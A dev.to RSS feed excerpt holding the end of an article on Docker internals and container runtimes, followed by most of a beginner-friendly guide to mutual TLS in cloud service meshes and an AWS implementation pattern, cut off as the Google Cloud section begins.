&lt;p&gt;&lt;strong&gt;Choose Kata Containers&lt;/strong&gt; when the shared-kernel threat model is unacceptable. Multi-tenant clouds running untrusted customer code, serverless platforms, or workloads that need compliance-grade proof of isolation all benefit from the hard VM boundary that namespaces alone cannot provide. Kata integrates cleanly into Kubernetes via the CRI interface, so it doesn't require rewriting orchestration logic.&lt;/p&gt;

&lt;p&gt;In practice, these tools coexist. A single Kubernetes cluster might run routine workloads with runc-backed containerd, security-sensitive jobs with Kata, and use Podman on developer laptops. The result is not competition but coexistence: Docker for accessibility, Podman for compliance and integration. The OCI standards ensure the images are interoperable regardless of which runtime executes them.&lt;/p&gt;




&lt;h2&gt;
  
  
  13. Summary and Key Takeaways
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftl3osdhknrvubtq1n0kb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftl3osdhknrvubtq1n0kb.png" alt="summary" width="800" height="95"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docker's power comes from its elegant composition of &lt;strong&gt;existing Linux primitives&lt;/strong&gt; — it invented none of the underlying technology. Namespaces existed since Linux 2.6.24 (2008). cgroups were added in 2.6.24 as well. Overlay filesystems predate Docker by years.&lt;/p&gt;

&lt;p&gt;What Docker did was &lt;strong&gt;package these primitives into a developer-friendly workflow&lt;/strong&gt;: a simple CLI, a declarative image format, a global registry, and a composable networking model. The internals are surprisingly simple once you see the full picture — it's the orchestration layer on top that makes it powerful.&lt;/p&gt;

&lt;p&gt;Understanding these internals gives you the ability to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Debug container issues&lt;/strong&gt; at the kernel level (&lt;code&gt;/proc&lt;/code&gt;, cgroup filesystem, namespace inspection)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optimize images&lt;/strong&gt; by understanding layer caching and CoW&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Harden security&lt;/strong&gt; by knowing exactly where the isolation boundaries are&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Choose alternatives&lt;/strong&gt; (containerd directly, Podman, kata-containers) with full knowledge of the tradeoffs&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>docker</category>
      <category>containers</category>
      <category>linux</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Understanding mTLS in Cloud Environments: A Complete Guide</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 01 Feb 2026 15:39:35 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/understanding-mtls-in-cloud-environments-a-complete-guide-3mdn</link>
      <guid>https://dev.to/piyushjajoo/understanding-mtls-in-cloud-environments-a-complete-guide-3mdn</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;In modern cloud architectures, securing communication between services is paramount. While traditional TLS (Transport Layer Security) protects data in transit, mutual TLS (mTLS) takes security a step further by requiring both parties to authenticate each other. This blog post will help you understand mTLS, how it works in cloud environments, and why it's becoming a standard practice for service-to-service communication.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is mTLS?
&lt;/h2&gt;

&lt;p&gt;Mutual TLS (mTLS) is a security protocol that extends standard TLS by requiring &lt;strong&gt;both&lt;/strong&gt; the client and server to authenticate each other using digital certificates. In traditional TLS, only the server proves its identity to the client (like when you visit a website with HTTPS). With mTLS, the client must also prove its identity to the server.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional TLS vs mTLS
&lt;/h3&gt;

&lt;p&gt;The fundamental difference between traditional TLS and mTLS is about who proves their identity. Let's compare them side by side:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzi7l1i5n5z602rcnnipk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzi7l1i5n5z602rcnnipk.png" alt="TLS vs mTLS" width="800" height="1016"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the difference:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional TLS (top section):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;This is what happens when you visit a website with HTTPS (like your bank's website)&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;client&lt;/strong&gt; (your browser) initiates the connection&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;server&lt;/strong&gt; presents its certificate to prove it's the legitimate website&lt;/li&gt;
&lt;li&gt;The client verifies the certificate and says "OK, you're who you claim to be"&lt;/li&gt;
&lt;li&gt;Connection established - but notice the server never verified who the client is&lt;/li&gt;
&lt;li&gt;The server has no idea if you're a legitimate user, a bot, or an attacker (that's why you still need to log in with a password)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Mutual TLS (bottom section):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Both parties prove their identity before establishing the connection&lt;/li&gt;
&lt;li&gt;The server still presents its certificate first (just like traditional TLS)&lt;/li&gt;
&lt;li&gt;But then the client ALSO presents its certificate&lt;/li&gt;
&lt;li&gt;The server verifies the client's certificate before allowing the connection&lt;/li&gt;
&lt;li&gt;Only after BOTH parties are verified does the encrypted connection establish&lt;/li&gt;
&lt;li&gt;This is like both people showing ID badges before entering a secure facility&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world analogy:&lt;/strong&gt; Traditional TLS is like calling a company - they answer "Hello, this is Acme Corporation" and you trust them. mTLS is like calling a secure government facility where they first verify who they are, then ask "What's your employee ID number?" before continuing the conversation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why mTLS Matters in Cloud Environments
&lt;/h2&gt;

&lt;p&gt;Cloud environments present unique security challenges:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust Networks&lt;/strong&gt;: In cloud environments, you can't rely on network perimeters for security&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Service-to-Service Communication&lt;/strong&gt;: Microservices need to authenticate each other&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic Infrastructure&lt;/strong&gt;: Services scale up and down, making IP-based security inadequate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance Requirements&lt;/strong&gt;: Many regulations require strong authentication for sensitive data&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  How mTLS Works: The Deep Dive
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Certificate-Based Authentication
&lt;/h3&gt;

&lt;p&gt;At the heart of mTLS is certificate-based authentication. Think of certificates like digital passports that prove who you are. Here's how the system works:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagzmbdpopd4cju255k4n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagzmbdpopd4cju255k4n.png" alt="Certificate based authentication" width="800" height="872"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the diagram:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Certificate Authority (CA)&lt;/strong&gt; - The purple box at the top is like a trusted government agency that issues passports. The CA is responsible for creating and signing certificates for both clients and servers. Everyone trusts the CA, so if the CA says "this certificate is valid," everyone believes it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Signing certificates&lt;/strong&gt; - When the CA "signs" a certificate, it's like putting an official stamp on a document. This signature proves the certificate is legitimate and hasn't been tampered with. The CA signs both the server's certificate and the client's certificate.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Server Side&lt;/strong&gt; (blue box) - Your application server receives a certificate from the CA and installs it. This certificate contains the server's identity (like its domain name) and a public key. It's the server's way of proving "I am who I say I am."&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Client Side&lt;/strong&gt; (green box) - Similarly, the client (which could be another microservice, an application, or any service making requests) also gets its own certificate from the CA. This is what makes mTLS "mutual" - the client also has to prove its identity.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The exchange&lt;/strong&gt; - When they connect, both the client and server present their certificates to each other. Each one checks the other's certificate against the CA to verify it's legitimate. It's like two people showing each other their passports before having a conversation.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This mutual verification ensures that both parties are authentic before any sensitive data is exchanged.&lt;/p&gt;

&lt;h3&gt;
  
  
  The mTLS Handshake Process
&lt;/h3&gt;

&lt;p&gt;Now let's walk through what actually happens when a client and server establish an mTLS connection. This process is called a "handshake" because it's like two people introducing themselves and agreeing on how to communicate securely.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqiunc3xugv7dxqhuh482.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqiunc3xugv7dxqhuh482.png" alt="mTLS handshake process" width="800" height="665"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Breaking down the handshake step-by-step:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: ClientHello&lt;/strong&gt; - The client initiates the conversation by sending a "hello" message to the server. This message includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which version of TLS the client supports (like saying "I speak TLS 1.3")&lt;/li&gt;
&lt;li&gt;A list of cipher suites (encryption methods) the client can use (like offering multiple languages to communicate in)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 2: ServerHello + Certificates&lt;/strong&gt; - The server responds with three important pieces:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ServerHello&lt;/strong&gt;: The server picks a TLS version and cipher suite that both parties support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server Certificate&lt;/strong&gt;: The server presents its digital certificate (its passport)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CertificateRequest&lt;/strong&gt;: This is the key difference from regular TLS! The server asks the client "show me YOUR certificate too"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 3-4: Client validates server&lt;/strong&gt; - Before proceeding, the client performs critical security checks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The client sends the server's certificate to the Certificate Authority (CA) for verification&lt;/li&gt;
&lt;li&gt;The CA checks: Is this certificate signed by me? Is it still valid? Has it been revoked?&lt;/li&gt;
&lt;li&gt;The CA responds with "Certificate Valid ✓" if all checks pass&lt;/li&gt;
&lt;li&gt;This verification happens in milliseconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Client sends its certificate&lt;/strong&gt; - If the server's certificate checks out, the client responds with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Client Certificate&lt;/strong&gt;: The client's own digital certificate proving its identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ClientKeyExchange&lt;/strong&gt;: Information needed to create the encryption keys for the session&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 6-7: Server validates client&lt;/strong&gt; - Now it's the server's turn to verify the client:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The server sends the client's certificate to the Certificate Authority for verification&lt;/li&gt;
&lt;li&gt;The CA checks: Is this certificate signed by me? Is it valid? Not revoked?&lt;/li&gt;
&lt;li&gt;The CA responds with "Certificate Valid ✓" &lt;/li&gt;
&lt;li&gt;Only after this verification does the server accept the client&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 8-9: Final confirmation&lt;/strong&gt; - Both parties send "ChangeCipherSpec" and "Finished" messages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;These messages are encrypted using the agreed-upon encryption method&lt;/li&gt;
&lt;li&gt;They confirm that both sides have the same encryption keys&lt;/li&gt;
&lt;li&gt;This is the final handshake before secure communication begins&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 10-11: Secure communication&lt;/strong&gt; - With mutual authentication complete:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;All data exchanged is now fully encrypted&lt;/li&gt;
&lt;li&gt;Both parties have verified each other's identities through the CA&lt;/li&gt;
&lt;li&gt;The connection is secure and ready for application data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Important note about CA verification:&lt;/strong&gt; In practice, the CA verification often happens locally using a cached list of trusted CA certificates and Certificate Revocation Lists (CRLs) or using OCSP (Online Certificate Status Protocol). The diagram shows it as a separate call for clarity, but this verification is what makes the "trusted CA" concept work.&lt;/p&gt;

&lt;p&gt;This entire process typically takes just a few milliseconds, but it establishes a secure, mutually authenticated connection that protects against eavesdropping, man-in-the-middle attacks, and impersonation.&lt;/p&gt;

&lt;h2&gt;
  
  
  mTLS in Cloud Architectures
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Microservices Communication
&lt;/h3&gt;

&lt;p&gt;In a typical cloud microservices architecture, mTLS ensures that only authorized services can communicate with each other. Let's look at how this works in practice:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvie4718ja6lq2d2b0aky.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvie4718ja6lq2d2b0aky.png" alt="microservices communication" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Breaking down the architecture:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;External User Connection:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Regular users (from web browsers or mobile apps) connect using standard &lt;strong&gt;HTTPS/TLS&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Users don't need certificates - they authenticate with usernames/passwords or tokens&lt;/li&gt;
&lt;li&gt;Only the API Gateway proves its identity to the user (one-way TLS)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;API Gateway (red box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Acts as the entry point to your cloud application&lt;/li&gt;
&lt;li&gt;Handles external TLS connections from users&lt;/li&gt;
&lt;li&gt;Converts to mTLS for all internal service communications&lt;/li&gt;
&lt;li&gt;This is the boundary between the untrusted internet and your trusted service mesh&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Service Mesh (gray box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Contains all your microservices (Auth, Order, Payment, etc.)&lt;/li&gt;
&lt;li&gt;Every service-to-service communication inside requires mTLS&lt;/li&gt;
&lt;li&gt;Think of it as a secure internal network where everyone must show ID&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Internal mTLS Connections (solid arrows):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;API → Auth&lt;/strong&gt;: When a user request comes in, the API Gateway must verify the user's credentials with the Auth Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API → Order&lt;/strong&gt;: To place an order, the API Gateway calls the Order Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order → Payment&lt;/strong&gt;: The Order Service needs to process payment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payment → DB&lt;/strong&gt;: The Payment Service securely stores transaction data&lt;/li&gt;
&lt;li&gt;Every one of these connections requires both parties to authenticate with certificates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Certificate Manager (yellow box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Cloud-native service (AWS Certificate Manager, Google Certificate Authority Service, etc.)&lt;/li&gt;
&lt;li&gt;Automatically issues certificates to each microservice&lt;/li&gt;
&lt;li&gt;Handles certificate rotation before they expire (dotted lines show this automated process)&lt;/li&gt;
&lt;li&gt;Without this automation, managing hundreds of certificates would be overwhelming&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why this architecture matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If an attacker compromises one service, they still can't impersonate other services without valid certificates&lt;/li&gt;
&lt;li&gt;Each service only trusts certificates signed by your Certificate Manager&lt;/li&gt;
&lt;li&gt;Network location doesn't matter - a service can't connect just because it's "inside" the cloud&lt;/li&gt;
&lt;li&gt;This is the foundation of "zero trust" security&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Cloud-Native Implementation Layers
&lt;/h3&gt;

&lt;p&gt;Understanding how mTLS is implemented in cloud environments requires looking at the different layers that work together. This diagram shows the typical architecture stack:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5iveh0typpjcc4n9or4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5iveh0typpjcc4n9or4.png" alt="Cloud native implementation layers" width="800" height="641"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding each layer:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Application Layer (top):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;These are your actual microservices - the business logic you write&lt;/li&gt;
&lt;li&gt;Microservice A, B, and C could be your user service, order service, payment service, etc.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Key insight&lt;/strong&gt;: Your application code doesn't need to know about mTLS at all!&lt;/li&gt;
&lt;li&gt;Developers can focus on business logic without writing security code&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Service Mesh Layer:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each microservice gets a "sidecar proxy" (usually Envoy)&lt;/li&gt;
&lt;li&gt;Think of the proxy as a security guard attached to each microservice&lt;/li&gt;
&lt;li&gt;The proxy handles all incoming and outgoing network traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;This is where mTLS actually happens&lt;/strong&gt; - the proxies do all the certificate work&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Proxy-to-Proxy Communication (bidirectional arrows):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When Microservice A wants to talk to Microservice B, the traffic goes through their proxies&lt;/li&gt;
&lt;li&gt;Proxy1 and Proxy2 establish an mTLS connection&lt;/li&gt;
&lt;li&gt;The microservices themselves just see regular unencrypted traffic (localhost communication)&lt;/li&gt;
&lt;li&gt;This pattern is called "transparent encryption"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Control Plane (blue box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The brain of the service mesh (Istio, Linkerd, etc.)&lt;/li&gt;
&lt;li&gt;Configures all the proxies with routing rules and security policies&lt;/li&gt;
&lt;li&gt;Tells each proxy which certificates to use&lt;/li&gt;
&lt;li&gt;Monitors the health of all connections&lt;/li&gt;
&lt;li&gt;You can think of it as the air traffic controller for your microservices&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Certificate Management Layer:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Internal CA&lt;/strong&gt;: Your own Certificate Authority that issues certificates for your services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auto-rotation&lt;/strong&gt;: Automatically renews certificates before they expire (maybe every 24 hours)&lt;/li&gt;
&lt;li&gt;This automation is critical - manually managing hundreds of certificates would be impossible&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Cloud Infrastructure Layer (bottom):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Cluster&lt;/strong&gt;: Orchestrates all your containers and services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secret Store&lt;/strong&gt;: Securely stores private keys and certificates&lt;/li&gt;
&lt;li&gt;Examples: AWS Secrets Manager, Google Cloud Secret Manager, Azure Key Vault&lt;/li&gt;
&lt;li&gt;The secret store ensures private keys are never exposed in code or config files&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;How it all works together:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Kubernetes starts up your microservices&lt;/li&gt;
&lt;li&gt;The Service Mesh Control Plane deploys a proxy alongside each microservice&lt;/li&gt;
&lt;li&gt;The CA generates certificates for each service and stores them in the Secret Store&lt;/li&gt;
&lt;li&gt;The Control Plane retrieves certificates and configures each proxy&lt;/li&gt;
&lt;li&gt;When services communicate, their proxies handle mTLS automatically&lt;/li&gt;
&lt;li&gt;Certificates rotate regularly without any application downtime&lt;/li&gt;
&lt;li&gt;Developers deploy code without worrying about any of this security machinery&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This layered approach means &lt;strong&gt;mTLS is invisible to application developers&lt;/strong&gt; while providing robust security across all service communications.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementing mTLS in Popular Cloud Platforms
&lt;/h2&gt;

&lt;h3&gt;
  
  
  AWS Implementation Pattern
&lt;/h3&gt;

&lt;p&gt;Let's see how mTLS is typically implemented in Amazon Web Services (AWS). This shows a real-world architecture pattern:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F071y9cug8unrhqfzhb5o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F071y9cug8unrhqfzhb5o.png" alt="AWS implementation pattern" width="800" height="409"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the AWS components:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Internet Users:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your customers, mobile apps, or web browsers&lt;/li&gt;
&lt;li&gt;They connect from the public internet using standard HTTPS&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Application Load Balancer (ALB):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The entry point from the internet into your AWS infrastructure&lt;/li&gt;
&lt;li&gt;Performs "TLS termination" - decrypts the incoming HTTPS traffic&lt;/li&gt;
&lt;li&gt;Uses certificates from &lt;strong&gt;AWS Certificate Manager (ACM)&lt;/strong&gt; for public-facing connections&lt;/li&gt;
&lt;li&gt;Forwards unencrypted HTTP traffic to your internal services (this is safe because it's inside your VPC)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;VPC (Virtual Private Cloud):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your isolated network in AWS&lt;/li&gt;
&lt;li&gt;Everything inside is protected from the public internet&lt;/li&gt;
&lt;li&gt;Think of it as your own private data center in the cloud&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;EKS Cluster (Elastic Kubernetes Service):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Managed Kubernetes environment provided by AWS&lt;/li&gt;
&lt;li&gt;Runs your containerized microservices in "pods"&lt;/li&gt;
&lt;li&gt;Each pod contains your application + an Envoy sidecar proxy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Pods with Envoy Sidecars:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Service A Pod&lt;/strong&gt; and &lt;strong&gt;Service B Pod&lt;/strong&gt; are your actual microservices&lt;/li&gt;
&lt;li&gt;Each has an Envoy proxy running alongside (the sidecar pattern)&lt;/li&gt;
&lt;li&gt;The proxies handle all mTLS communication between services&lt;/li&gt;
&lt;li&gt;Notice the bidirectional mTLS arrow between Pod1 and Pod2&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;AWS Private CA (orange box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A managed Certificate Authority service&lt;/li&gt;
&lt;li&gt;Issues certificates specifically for internal service-to-service communication&lt;/li&gt;
&lt;li&gt;These certificates are never exposed to the public internet&lt;/li&gt;
&lt;li&gt;Automatically rotates certificates to maintain security&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;AWS App Mesh (purple box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AWS's service mesh solution (built on Envoy)&lt;/li&gt;
&lt;li&gt;The control plane that manages all the proxies&lt;/li&gt;
&lt;li&gt;Gets certificates from Private CA and distributes them to pods&lt;/li&gt;
&lt;li&gt;Configures routing, security policies, and observability&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;AWS Secrets Manager:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Securely stores the private keys for your certificates&lt;/li&gt;
&lt;li&gt;Pods retrieve their keys at startup&lt;/li&gt;
&lt;li&gt;Keys are encrypted at rest and in transit&lt;/li&gt;
&lt;li&gt;Access is controlled by AWS IAM policies&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The flow of traffic:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;External&lt;/strong&gt;: User → HTTPS → ALB (using ACM public certificate)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ALB to internal&lt;/strong&gt;: ALB → HTTP → Pod1 (unencrypted inside VPC)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Service-to-service&lt;/strong&gt;: Pod1 ↔ mTLS ↔ Pod2 (secured with Private CA certificates)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Why this split approach?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Public-facing (ACM)&lt;/strong&gt;: Certificates for internet users don't need to verify client identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Internal (Private CA)&lt;/strong&gt;: Services verify each other's identity with mTLS&lt;/li&gt;
&lt;li&gt;This separation follows the principle of "defense in depth" - different security layers for different threats&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key AWS benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Fully managed services (no certificate servers to maintain)&lt;/li&gt;
&lt;li&gt;Automatic certificate rotation&lt;/li&gt;
&lt;li&gt;Integration with AWS IAM for access control&lt;/li&gt;
&lt;li&gt;Pay only for what you use&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Google Cloud Implementation Pattern
&lt;/h3&gt;

&lt;p&gt;Now let's look at how Google Cloud Platform (GCP) handles mTLS. While conceptually similar to AWS, GCP has its own set of services and approaches:&lt;/p&gt;

